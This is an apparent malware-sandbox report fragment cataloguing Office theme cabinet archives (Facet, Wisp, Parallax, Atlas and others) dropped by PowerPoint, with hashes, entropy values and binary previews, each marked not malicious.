                                                                                                                              SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                              MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                              SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                              SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                              SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26944
                                                                                                                              Entropy (8bit):7.7574645319832225
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                              MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                              SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                              SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                              SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):222992
                                                                                                                              Entropy (8bit):7.994458910952451
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                              MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                              SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                              SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                              SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276650
                                                                                                                              Entropy (8bit):7.995561338730199
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                              MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                              SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                              SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                              SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):295527
                                                                                                                              Entropy (8bit):7.996203550147553
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                              MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                              SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                              SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                              SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):271273
                                                                                                                              Entropy (8bit):7.995547668305345
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                              MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                              SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                              SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                              SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):261258
                                                                                                                              Entropy (8bit):7.99541965268665
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                              MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                              SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                              SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                              SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):307348
                                                                                                                              Entropy (8bit):7.996451393909308
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                              MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                              SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                              SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                              SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 471473 bytes, 2 files, at 0x44 +A "content.inf" +A "Facet.thmx", flags 0x4, ID 35621, number 1, extra bytes 20 in head, 23 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):487545
                                                                                                                              Entropy (8bit):7.997899883595182
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:mPoUL7rdGbRXiXMDCVcP0EO3bozD1icl+CabWQRgqOqqs/eMFq8qZumLXvjKUUo6:2D9QdiXMbMxUti/RbWhqcMw8WKUUovC
                                                                                                                              MD5:B4312FCA4A8A21F8905311D4427E87BB
                                                                                                                              SHA1:50B314F6CE6D4508557444E04E6265B7353D1087
                                                                                                                              SHA-256:4087D3C1E0D93567E67FC8F17CD3AD5587C2FC203B1BBEB8D7A01A750D54E924
                                                                                                                              SHA-512:6F828DEE15B3351CD15C5B9388AFB117B61ABDBC45559A7CC0106173E5BC2088BABC551474E9F27D183F5DBB3273520A1029B5FC514984FFCB473273C1A6F6F9
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....1......D...............%............1...>..........{..................N.. .content.inf.}D.........N.. .Facet.thmx.]..].k..[......@........&...Qm.UU.A0.U...UU.S.TQS...............XU....>.2...l...K.#........OH.i.w...lX.m_./..._.......q.]s..-.v.kw.M$.v.aq.&..S.n..ad.....D.....hF.........n..@e.$.Z....".G.z........@@..o)o.:...8. .8........p.o........I.........._........9...Qd....i.A....Sp...)...7 .....qSAq.........o.....p>.......?...........y......'...OFk...`b........A.....?(f.....O.4...xO..s...xz...._.H..R....(.........e......5:7..-.9.3^G.....]....WSES..,..9....A..C.r.....d#....I....T.M.=...V.z..|p...[Y....=.Y.m.L.g.w..|....[..M..q...5......]....;.T......c...\|.6.o.QO1>Kb.&.2.B{kA......B.k..sU3{.~.2.. o#.RW...R..J.M.G....b.r.8.,$T.%.V.....h......\:....|<..t...~...-$.....J..#..8q.z..d...aB..<..[?...+msH.B5..t.....(..|...x.=..........\0.iKl.,..-...QTd...H_...`.5.........p......Iw$..?.q....S=0..p.V.........p.]n*j.s+.$..P+..t....f...k..Tv.fj.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):230916
                                                                                                                              Entropy (8bit):7.994759087207758
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                              MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                              SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                              SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                              SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 480282 bytes, 2 files, at 0x44 +A "content.inf" +A "Wisp.thmx", flags 0x4, ID 56119, number 1, extra bytes 20 in head, 25 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):496354
                                                                                                                              Entropy (8bit):7.997206654807112
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:ZqKfByFV1zSEVKRLYSh6YaYJkImjMjmf0fPae/:Z5QFV1GRbhvaYKB0fy8
                                                                                                                              MD5:AD2D82C2A623C1176D25727003F474A6
                                                                                                                              SHA1:2E1D67BFC138A7533E13B19FB1747FED47305104
                                                                                                                              SHA-256:34A36FF02892FD8F89C77992EC7A7EB0FD1459483ECCBBEE139C38646E8685FF
                                                                                                                              SHA-512:1D0D19CE2A144C6DCC18E894BF2DCC8D47AD4BBCFE93D371686572E1D2DB5954685496681311BDA429684EEEFAB874391A351B0670A7124200C1D49D6717A9F8
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....T......D...............7............T...>..........z..................N.. .content.inf............N.. .Wisp.thmx..;.V.x..[...............5.!$$.AA.{i..%."../.5x.y.^........{...0dD.h......v.......K..@.5.'..@X..c.O..X.vv.#....^.A.j.~gH...%....:...H..a....j..I...;j &..UB.P.@...a..%..............6..}..A.3IA%..=...|.c.gh.$u`.a...A.Ax@`C` . ...... ...Kj,..d= ..)...D."<".B...w3.. .....oV.....5....$...4;Y..A..G.....4.7...?.. ....w..i....'...s.9.o..;.=.\...0o... ...\......?.......%..............;."..<..h...g'.3;.r.....1.....Y..{.`..S+.+.-.....v.N\I.....mM.s7Q/.....}.. .0....k.E....j.....Xv..i8.d=.O... 7^o..qo.t..w..{....W.N.-.f68.j..Z..gP.."i..(tA..]e.^...f.M...d...JQf....gM.U........dN.:..Wsq.R..Y....l..d8..D~..v.U;..'f3*#.6...}.....%...s....FG.......y.ALV..>...Z...%..V91.`|..3uB..4..}L.R.+.....(k.i&....."..^....D.$$.k..;.*........U..J..Z...}..5Y}`....'.w.<..44.U9....8.\g...{.y".4..@.n.t`...u..7[.z.t.`..ZQ.K._.@a.z!T.VqlR..Y.Q.cMe.a f+...#.. .cpH.,#I;.)n<y.<..l
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):550906
                                                                                                                              Entropy (8bit):7.998289614787931
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                              MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                              SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                              SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                              SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):723359
                                                                                                                              Entropy (8bit):7.997550445816903
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                              MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                              SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                              SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                              SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 437097 bytes, 2 files, at 0x44 +A "Atlas.thmx" +A "content.inf", flags 0x4, ID 18422, number 1, extra bytes 20 in head, 27 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):453305
                                                                                                                              Entropy (8bit):7.997509772969848
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:6144:Ggji1e3pEwbB2Y02HSiPTiGE74Go8D6CFQQ5sIxrV2CnOzIt5E6H7f1ADW0QFQhX:GMP9JTHjPuT9+KKIKCnO16bfGGStAM
                                                                                                                              MD5:271FF904CEB8B5383B45ECF0DA6A9238
